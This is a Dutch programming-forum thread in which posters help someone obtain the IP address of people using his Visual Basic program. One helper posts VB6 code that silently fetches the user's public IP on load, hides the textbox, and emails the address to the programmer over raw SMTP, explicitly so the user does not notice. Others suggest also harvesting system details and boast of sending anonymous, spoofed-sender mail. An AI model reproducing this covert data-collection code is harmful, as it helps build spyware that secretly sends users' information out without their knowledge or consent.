IP-adres

Status
Niet open voor verdere reacties.

HellupUandMe

Gebruiker
Lid geworden
21 jan 2007
Heeft iemand enig idee hoe je in Visual Basic 2005 het ip-adres kan achterhalen van de gene die jouw programaatje gebruikt?

maak dat ie met je programmatje een mailtje stuurt naar jou, en daarin zie je dan zijn IP adres...:D :thumb: ;)

Dat zou ik wel willen maar ik weet niet hoe het moet. En dat wil ik trouwens voor een ander programaatje gebruiken. Voor dit programaatje wil ik alleen dat als de gebruiker op button1 klikt dat zijn ip-adres op label1 komt te staan.

Maar toch bedankt!

Je gaat op je toolwindowtje staan, je klikt op rechtermuisknop en dan op Components. Je zoekt naar Microsoft Winsock Control 6.0, je vinkt hem aan en klikt op Toepassen en dan op Sluiten.
Je zet het winsock Control in je form. Maak nu een Command en een Text aan. Verander de naam van de Command en de Text niet en Plaats deze (korte :D ;) ) code:

Code:
Private Sub Command1_Click()
Text1.Text = Winsock1.LocalIP
End Sub

Klik 1 keer op de knop en je ip staat in de textblok!
Dit is je LOCAL IP, ik ben zelf nog op zoek naar hoe je het IP krijgt dat naar buiten gaat.. Als ik het weet zal ik het posten.
Succes ermee, Ronald!

Beste HellupUandMe,
Ik heb nog even gezocht en gevonden. In plaats van Winsock gebruiken we nu Inet. Je zoekt het op dezelfde manier op:
Op je toolwindow > rechtermuisknop > Componentes > Microsoft Internet Transfer Control 6.0. Je vinkt deze aan, je klikt op toepassen en dan op sluiten.
Je plaatst het Inet Control op je Form, Maak een Text en een Command aan en zet deze code neer:

Code:
 Dim MyIP As String
    MyIP = Inet1.OpenURL("http://pchelplive.com/ip.php")
Text1.Text = MyIP
End Sub

Ik zal verder nog even zoeken hoe diegene direct, zonder dat diegene het ziet, een emailtje met het gegeven IP-Adres naar jou stuurt.
Veel succes ermee!

Grtz, Ronald!

Het is erg moeilijk om het voor elkaar te krijgen dat er een mailtje gestuurd wordt zonder dat diegene het merkt. Ik denk dat er met Winsock gewerkt moet worden, ik heb al eens eerder hiernaar gekeken, want ik wil het zelf ook gebruiken. Ik hoop dat ik het vind, en vind iemand anders het hoe het moet.. zou je het graag hier willen posten.

Alvast bedankt en succes verder!

Greetz, Ronald.

Gevonden!

Goeiemorgen:D Ik heb nog eens gezocht, en gevonden!
Ik heb het uitgetest, en bij mij doet hij het. Ik zal even er nog wat bij zetten en dan zal ik het bestand even proberen te uploaden.

Grtz, Ronald:thumb:

Hier even hoe je het moet doen. Ik heb in de code wat dingen erbij gezet voor uitleg. Snap je het niet, post het hier;) !
Maak een Winsock, een Inet, een Text en een Command aan op je Form. Verander de naam NIET. Zet vervolgens deze code erin, en hij zou het moeten doen! Succes ermee.

Code:
Dim received As Boolean

Dim tekst
  tekst = Text1.Text

sFrom$ = "HIER HET EMAILADRES VAN DEGENE DIE JE PROGJE GEBRUIKT, als je die niet weet typ je je eigen in ofzo, maakt niet veel uit"
  sTo$ = "HIER DOE JE JE EIGEN EMAILADRES, ZODAT HET BERICHT NAAR JOU GESTUURD WORDT"
  sSubject$ = "HIER DOE JE HET ONDERWERP, WAT JE WIL"
  sMessage$ = tekst 'Dit betekent dus wat je in Text1.Text in typt als bericht wordt verzonden, nu gaan we dus het IP in een textblok zetten, en het IP wordt naar jou gestuurd!

Winsock1.Connect "HIER DOE JE MAIL SERVER, bijvoorbeeld mail.yahoo.com of mail.planet.nl, moet je even kijken wat je hebt", 25

Do While Winsock1.State <> sckConnected: DoEvents: Loop

sendMsg "HELO " & Winsock1.LocalHostName 'Dit is dat je naam van je pc wordt gebruikt, is verder niet gevaarlijk!
    sendMsg "MAIL FROM: <" & sFrom & ">"
    sendMsg "RCPT TO: <" & sTo & ">"
    sendMsg "DATA"
     'Verder kun je alles gewoon laten staan kijk nog even helemaal onderaan, Succes ermee!!

m$ = m$ + "From: <" + sFrom + ">" + vbCrLf
    m$ = m$ + "To: <" + sTo + ">" + vbCrLf
    m$ = m$ + "Subject: " + sSubject$ + vbCrLf
    m$ = m$ + "Date: " + Format$(Now, "h:mm:ss") + vbCrLf
    m$ = m$ + "MIME-Version: 1.0" + vbCrLf
    m$ = m$ + "Content-Type: text/plain; charset=us-ascii" + vbCrLf + vbCrLf

m$ = m$ + sMessage$ + vbCrLf + vbCrLf + "." + vbCrLf

sendMsg m$ + "QUIT"

Winsock1.Close
  End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
    received = True
  End Sub

Sub sendMsg(m$)
    Winsock1.SendData m$ + vbCrLf

received = False
    Do Until received
      DoEvents
    Loop
  End Sub

Private Sub Form_Load()
Dim MyIP As String
MyIP = Inet1.OpenURL("http://pchelplive.com/ip.php")
Text1.Text = MyIP 'Nu wordt dus bij het laden het IP in het tekstblok gezet, je kunt
                            'deze op Visible = False zetten zodat diegene het niet ziet.
                            'Als je nu op de knop drukt wordt de inhoud van text1 (Het ip in dit geval)
                            'naar jou toe gezonden
End Sub

Hier even hoe je het moet doen. Ik heb in de code wat dingen erbij gezet voor uitleg. Snap je het niet, post het hier;) !
Maak een Winsock, een Inet, een Text en een Command aan op je Form. Verander de naam NIET. Zet vervolgens deze code erin, en hij zou het moeten doen! Succes ermee.

Code:
Dim received As Boolean

Dim tekst
  tekst = Text1.Text

sFrom$ = "HIER HET EMAILADRES VAN DEGENE DIE JE PROGJE GEBRUIKT, als je die niet weet typ je je eigen in ofzo, maakt niet veel uit"
  sTo$ = "HIER DOE JE JE EIGEN EMAILADRES, ZODAT HET BERICHT NAAR JOU GESTUURD WORDT"
  sSubject$ = "HIER DOE JE HET ONDERWERP, WAT JE WIL"
  sMessage$ = tekst 'Dit betekent dus wat je in Text1.Text in typt als bericht wordt ver..........................

Vet ik heb dat nog nooit gedaan heb ik ook weer wat geleert lol :thumb:

ik denk dat je vraag over hoe je het ip kan achterhalen nu wel beantwoord is dus heb ik daar niks meer aan toe te voegen.

Mailtje sturen naar iemand zonder dat de user er achterkomt en ip achterhalen van een client computer... klinkt alsof iemand informatie van iemands computer wilt hebben om :evil: dingen mee te doen.

lol

Wat ook leuk is is om my.Computer.Info..... te gebruiken in vb2005. Hiermee kan je informatie over zijn systeem krijgen zoals de OS versie en Ram groote. lol

Fly3rbug

Heej man!:D Ik heb er zelf ook een email verzender (gwoon soort outlook express) mee gemaakt:thumb: , daarmee kan ik nu anoniem emailtjes sturen!!:p Misschien ooit nog is handig;)

Greetz, Ronald!

Gesloten

Echt heel erg bedankt dat jullie mij zo helpen maar ik zie nergens componements of zoiets staan. Misschien komt het doordat ik de Express Edition heb.
Nou ja toch bedankt, mochten jullie dit nog lezen.

Heej man!:D Ik heb er zelf ook een email verzender (gwoon soort outlook express) mee gemaakt:thumb: , daarmee kan ik nu anoniem emailtjes sturen!!:p Misschien ooit nog is handig;)

Greetz, Ronald!

Gesloten

Nooi helemaal he, je ip-adres... of je moet zo'n ip switcher hebben.

Het IP wordt volgensmij niet meegezonden:) Daarvoor zit er ook weer wat in!

er zit een stukje van een forum bij, het internet gedoe!
Verder zelf gemaakt!;)

Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan